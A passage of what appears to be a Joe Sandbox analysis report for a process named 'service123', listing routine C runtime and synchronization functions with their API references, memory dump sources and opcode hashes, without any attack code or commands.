memcpy.MSVCRT(?,?,?,?,?,?,6CA2997F), ref: 6CA2B3A1
memcpy.MSVCRT(00000000,?,?,6CA2997F), ref: 6CA2B3E8

Strings

basic_string::assign, xrefs: 6CA2B403

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: memcpy$memmove
String ID: basic_string::assign
API String ID: 1283327689-2385367300
Opcode ID: aac77c9e2be4eecbcae94a54ca8dcebee4563578cf5a4df9ecd2921434cf5cae
Instruction ID: 81b3fb3f1a8a8a2e41c48025bfdcd9470980e00e959396eec8461c72131704a5
Opcode Fuzzy Hash: aac77c9e2be4eecbcae94a54ca8dcebee4563578cf5a4df9ecd2921434cf5cae
Instruction Fuzzy Hash: 3751AC71B0A6218BD714DF29E58461EF7F1FF95308B18866DE4468BB14E734D885CB82

Function 6CA34410 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 150COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 6CA34471
memcpy.MSVCRT ref: 6CA344DF
memcpy.MSVCRT ref: 6CA34518

Strings

basic_string::assign, xrefs: 6CA34534

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: memcpy$memmove
String ID: basic_string::assign
API String ID: 1283327689-2385367300
Opcode ID: 3382e6184b56b4c5a3435a99c48758b2724a305012efc012dd072d4fc1a9621c
Instruction ID: fcff9289679082c227b8a5db25209ad11c6af891fa08f425cc8f011222e621f3
Opcode Fuzzy Hash: 3382e6184b56b4c5a3435a99c48758b2724a305012efc012dd072d4fc1a9621c
Instruction Fuzzy Hash: 6451BE71B0A7218FD700DF28D09460AFFE5AF92308F15896DE488CB718D732D885CB92

Function 6C9EE980 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 127stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C9EE9AA
wcslen.MSVCRT ref: 6C9EEA1A

Strings

basic_string: construction from null is not valid, xrefs: 6C9EE9E2, 6C9EEA52, 6C9EEAC2

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: strlenwcslen
String ID: basic_string: construction from null is not valid
API String ID: 803329031-2991274800
Opcode ID: 73f2e83f8f2c95e1628f07271304d77e93aa74ee8bf3f913f0377c2e24feead1
Instruction ID: e52763fe1753b6e5519e2318af31fdea17e5d4a4022ffa94a78c6baa0a147558
Opcode Fuzzy Hash: 73f2e83f8f2c95e1628f07271304d77e93aa74ee8bf3f913f0377c2e24feead1
Instruction Fuzzy Hash: 0A41CFF1A056108FCB01FF2CD58184ABBE4BF69214F16497DE8858B718E331E889CBD2

Function 6C9EE581 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 115stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C9EE5AD
strlen.MSVCRT ref: 6C9EE5FD

Strings

basic_string: construction from null is not valid, xrefs: 6C9EE5CF, 6C9EE61F, 6C9EE66F

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: strlen
String ID: basic_string: construction from null is not valid
API String ID: 39653677-2991274800
Opcode ID: e1d6c0b288638b44a1f45670af5b80c6b4174b621e686e1345007bf1e643b518
Instruction ID: 1059d5a0260a21e3715b162fb25883f4d0d23fd446fde73ffb0263f1ca0282d2
Opcode Fuzzy Hash: e1d6c0b288638b44a1f45670af5b80c6b4174b621e686e1345007bf1e643b518
Instruction Fuzzy Hash: 8B3182B16157158FCB01FF2CC58188ABBE4AF19618B06496DE8849F711D731EC89CB92

Function 001C7C40 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

IsDBCSLeadByteEx.KERNEL32 ref: 001C7C92
MultiByteToWideChar.KERNEL32 ref: 001C7CD5

Memory Dump Source

Source File: 0000000F.00000002.4317963896.00000000001C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 001C0000, based on PE: true

Associated: 0000000F.00000002.4317867359.00000000001C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318055955.00000000001CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318171900.00000000001CE000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318267182.00000000001D1000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1c0000_service123.jbxd

Similarity

API ID: Byte$CharLeadMultiWide
String ID:
API String ID: 2561704868-0
Opcode ID: 7aa87af88f817765112237c896dd3e2a383da234eedd21d0f73e68578dfe74d5
Instruction ID: 2a8357d01f711814ffd9c2a4e2d69a2f6496d90f6d12ecb08474b81d71988aac
Opcode Fuzzy Hash: 7aa87af88f817765112237c896dd3e2a383da234eedd21d0f73e68578dfe74d5
Instruction Fuzzy Hash: 1631F0B05083818FD710DF69D584B6ABBE0BF95314F04892EE8958B390E7B6D849CF92

Function 6C9D9660 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

IsDBCSLeadByteEx.KERNEL32 ref: 6C9D96B2
MultiByteToWideChar.KERNEL32 ref: 6C9D96F5

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: Byte$CharLeadMultiWide
String ID:
API String ID: 2561704868-0
Opcode ID: 58aaefac2052b19ed165b0affeab8fc242a328db4fe2d4d145879767e635e2b9
Instruction ID: 805f9fc08eff5b7d734246c11a024ef048ea47a026430b2de25eb4e50c2de423
Opcode Fuzzy Hash: 58aaefac2052b19ed165b0affeab8fc242a328db4fe2d4d145879767e635e2b9
Instruction Fuzzy Hash: 5F3139705097418FD700EF29D19438ABBF4BF86718F12892DE8D497350D776E849CB82

Function 6C9CF511 Relevance: 6.1, APIs: 4, Instructions: 91COMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 6C9CF5C1

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: ReleaseSemaphore
String ID:
API String ID: 452062969-0
Opcode ID: 84a8331d94cc46f8943ca932d175f02081cfacff7cec8578f12a825c6301d684
Instruction ID: 913e616a4e03cae5392c645850f15d8e94444e0b9b8cf2e429a9fc59f0ba985c
Opcode Fuzzy Hash: 84a8331d94cc46f8943ca932d175f02081cfacff7cec8578f12a825c6301d684
Instruction Fuzzy Hash: D4412570B0A3028FDB48DF29D6843567BF4BB4A318F14C618E9588B655D730E44ADB93

Function 6C9CF6B0 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 6C9CF751

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: ReleaseSemaphore
String ID:
API String ID: 452062969-0
Opcode ID: 6ad4c4fce019949bbc788a25ae2a94c2196782e37097026a0587a1c86cd588fa
Instruction ID: 1e9c34d987dd69a20d1120af6e4853d40b21797f72da6dd2a7cdd40e41e703ff
Opcode Fuzzy Hash: 6ad4c4fce019949bbc788a25ae2a94c2196782e37097026a0587a1c86cd588fa
Instruction Fuzzy Hash: 883145B0B0A3028FDB48DF29C6883067BF4BB4A328F15C25DD8588B695D731D446DB93

Function 6C9CF9D1 Relevance: 6.1, APIs: 4, Instructions: 81synchronizationCOMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 6C9CFA72
CreateSemaphoreW.KERNEL32 ref: 6C9CFAB7
WaitForSingleObject.KERNEL32 ref: 6C9CFB00

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: Semaphore$CreateObjectReleaseSingleWait
String ID:
API String ID: 3817295960-0
Opcode ID: df0fc7e0bfd81830c2dc765188d536f11bb2fb97100d231eb6df6b18be368888
Instruction ID: 8bea093804529281d329c8d7d6c0138e1c66e7868ea75e01be2f99ccb10e0bdf
Opcode Fuzzy Hash: df0fc7e0bfd81830c2dc765188d536f11bb2fb97100d231eb6df6b18be368888
Instruction Fuzzy Hash: D331F370B093028FDB58DF29C684306BBF4BB4A328F14C65DE8598B285E734D946DB93

Function 6C9CFB60 Relevance: 6.1, APIs: 4, Instructions: 76synchronizationCOMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 6C9CFBF2
CreateSemaphoreW.KERNEL32 ref: 6C9CFC37
WaitForSingleObject.KERNEL32 ref: 6C9CFC80

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: Semaphore$CreateObjectReleaseSingleWait
String ID:
API String ID: 3817295960-0
Opcode ID: dcdfb00975ea1ea231a5e81155241fcf2c01ad51e1c59328f4004f0a12ad603b
Instruction ID: 4b488a9ac3f7eb452bfba9cb97ec26a8cc64d2dd5e5938680cbc942baa122bc5
Opcode Fuzzy Hash: dcdfb00975ea1ea231a5e81155241fcf2c01ad51e1c59328f4004f0a12ad603b
Instruction Fuzzy Hash: 2231E4B0B493028FDB48DF29C6883067BF4BB4A368F14C25CE8598B685D735D546DBA3

Function 6C9C55A8 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 64stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C9C72FE

Strings

this, xrefs: 6C9C55B3
}, xrefs: 6C9C7392
{parm#, xrefs: 6C9C72D9

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: strlen
String ID: this${parm#$}
API String ID: 39653677-3278767634
Opcode ID: 17567238643a5238e1eea545a8a223233c78600ce5871ac5b5013b37085d142c
Instruction ID: 14e5f11717359e23bc4c744f77458a112a380e91100cb11d417be94887fc67e9
Opcode Fuzzy Hash: 17567238643a5238e1eea545a8a223233c78600ce5871ac5b5013b37085d142c
Instruction Fuzzy Hash: 91218D7164D242CFD7018F18D0803A9BBA1AFA2304F1885BEDCD84FA0BD775D4859BA3

Function 001C1001 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

__set_app_type.MSVCRT ref: 001C106B
__p__fmode.MSVCRT ref: 001C1070
__p__commode.MSVCRT ref: 001C107D

Memory Dump Source

Source File: 0000000F.00000002.4317963896.00000000001C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 001C0000, based on PE: true

Associated: 0000000F.00000002.4317867359.00000000001C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318055955.00000000001CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318171900.00000000001CE000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318267182.00000000001D1000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1c0000_service123.jbxd

Similarity

API ID: __p__commode__p__fmode__set_app_type
String ID:
API String ID: 3338496922-0
Opcode ID: eba9a81440ecb26113f20a41550dbf1aaa3fed97bb625a9677d26a242ba2ae26
Instruction ID: 4bd16aa374edc075b0d635f155588fa3cbe36dead3e975034bb417cd0578e02c
Opcode Fuzzy Hash: eba9a81440ecb26113f20a41550dbf1aaa3fed97bb625a9677d26a242ba2ae26
Instruction Fuzzy Hash: 00210F70580201DBC314AF24D845F653BE0BB32344FA5892CF4184BA57E77AD8E7CB96

Function 6CA39F70 Relevance: 6.0, APIs: 4, Instructions: 30stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6CA39F85
strlen.MSVCRT ref: 6CA39F8F
memcpy.MSVCRT ref: 6CA39FB8
setlocale.MSVCRT ref: 6CA39FCC

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: setlocale$memcpystrlen
String ID:
API String ID: 4096897932-0
Opcode ID: 45c4bd314c0c504c88d1cd11729f159ce0606c1831af889757d8c36772942400
Instruction ID: d268f9565ae692014b6e4a4a6c7a745dd9fce896ec88719a508ddbe9c96bc0c4
Opcode Fuzzy Hash: 45c4bd314c0c504c88d1cd11729f159ce0606c1831af889757d8c36772942400
Instruction Fuzzy Hash: 38F03AB65097209AD7007F6895553AFBAE4EFA0644F428C5DE0C89B710EB74D488CB82

Function 001C4558 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243COMMON

Download Yara Rule

Strings

@, xrefs: 001C4647
u, xrefs: 001C4596

Memory Dump Source

Source File: 0000000F.00000002.4317963896.00000000001C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 001C0000, based on PE: true

Associated: 0000000F.00000002.4317867359.00000000001C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318055955.00000000001CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318171900.00000000001CE000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318267182.00000000001D1000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1c0000_service123.jbxd

Similarity

API ID:
String ID: @$u
API String ID: 0-1583100103
Opcode ID: fa47ec1fd591023c78eec2ecf1cdfdf8d3a1521a549747c40c75554b0ff7ecbc
Instruction ID: cfa10f7d7f747afbaf623d35eea0d96cf4d71897a60f2579756cb4d8eb79bc3f
Opcode Fuzzy Hash: fa47ec1fd591023c78eec2ecf1cdfdf8d3a1521a549747c40c75554b0ff7ecbc
Instruction Fuzzy Hash: 39A1B13150C3918BC734CF24C0A0BABBBE1BFA5714F258A1DE8D997292D735D949DB82

Function 6C9D4C28 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243COMMON

Download Yara Rule

Strings

@, xrefs: 6C9D4D17
u, xrefs: 6C9D4C66

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID:
String ID: @$u
API String ID: 0-1583100103
Opcode ID: 1b674c02f098de7177372c5e475f38a91454233f3ab7122de77cffc49c3eb962
Instruction ID: 18043c1c9eb8586e2099c6148129852d26833e806b0675f04523fbb482882cbe
Opcode Fuzzy Hash: 1b674c02f098de7177372c5e475f38a91454233f3ab7122de77cffc49c3eb962
Instruction Fuzzy Hash: 00A19E7160CB968BD720CF25D09039ABBE5BB85308F16CA1DE8D8AB741D734E549CF82

Function 001C4C21 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 001C4DBE

Part of subcall function 001C2830: fputc.MSVCRT ref: 001C28F8

Strings

(null), xrefs: 001C4C27
@, xrefs: 001C4647

Memory Dump Source

Source File: 0000000F.00000002.4317963896.00000000001C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 001C0000, based on PE: true

Associated: 0000000F.00000002.4317867359.00000000001C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318055955.00000000001CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318171900.00000000001CE000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318267182.00000000001D1000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1c0000_service123.jbxd

Similarity

API ID: fputcwcslen
String ID: (null)$@
API String ID: 1336801768-1380778734
Opcode ID: a92c0b06f78f9dc8d035cff107e1b7c1fbb13275a57c19de51f070b7386af58f
Instruction ID: ac1e4e2f0f4546ccd63cd1c804a6eac4a0d367fd2af9b06af80aee9c6f1904d1
Opcode Fuzzy Hash: a92c0b06f78f9dc8d035cff107e1b7c1fbb13275a57c19de51f070b7386af58f
Instruction Fuzzy Hash: 3491B13160C3918BD731CF24C0A0BAABBE1BFA5714F258A1DE8D997382D735D905DB82

Function 6C9D52F1 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C9D548E

Part of subcall function 6C9D2F00: fputc.MSVCRT ref: 6C9D2FC8

Strings

@, xrefs: 6C9D4D17
(null), xrefs: 6C9D52F7

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: fputcwcslen
String ID: (null)$@
API String ID: 1336801768-1380778734
Opcode ID: eeae05f04e6e123ff4c8138bd44fc254bc7d8f77d6d44c84df364fbd0a464c12
Instruction ID: 8965afbfb27c06518a16579066a865e0da14297a9bae48eee0f89fb0fae0dc26
Opcode Fuzzy Hash: eeae05f04e6e123ff4c8138bd44fc254bc7d8f77d6d44c84df364fbd0a464c12
Instruction Fuzzy Hash: E291AF7160CB958BD7218F24D09039ABBE5BF85318F16CA1DE8DCA7741D735E90ACB82

Function 6CA55DB0 Relevance: 5.4, APIs: 4, Instructions: 369stringCOMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6CA55DEA
wcslen.MSVCRT ref: 6CA55E7C
wcslen.MSVCRT ref: 6CA55F0E
strlen.MSVCRT ref: 6CA55FA0

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: wcslen$strlen
String ID:
API String ID: 1625065929-0
Opcode ID: e2ce5da072546071f38ce35e9e5ec383b5caf59ffdf371f83d8c12f9a0499ae7
Instruction ID: 8a88185b93320360c1b2ef2f49009a3b4f1f8de74f8140fb358eb474fc05bd19
Opcode Fuzzy Hash: e2ce5da072546071f38ce35e9e5ec383b5caf59ffdf371f83d8c12f9a0499ae7
Instruction Fuzzy Hash: 94F18CB0A056068FCB00DF6CC1849AEFBF1FF49314B558A28E895CB750E735E989CB81

Function 6CA555D0 Relevance: 5.4, APIs: 4, Instructions: 369stringCOMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6CA5560A
wcslen.MSVCRT ref: 6CA5569C
wcslen.MSVCRT ref: 6CA5572E
strlen.MSVCRT ref: 6CA557C0

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
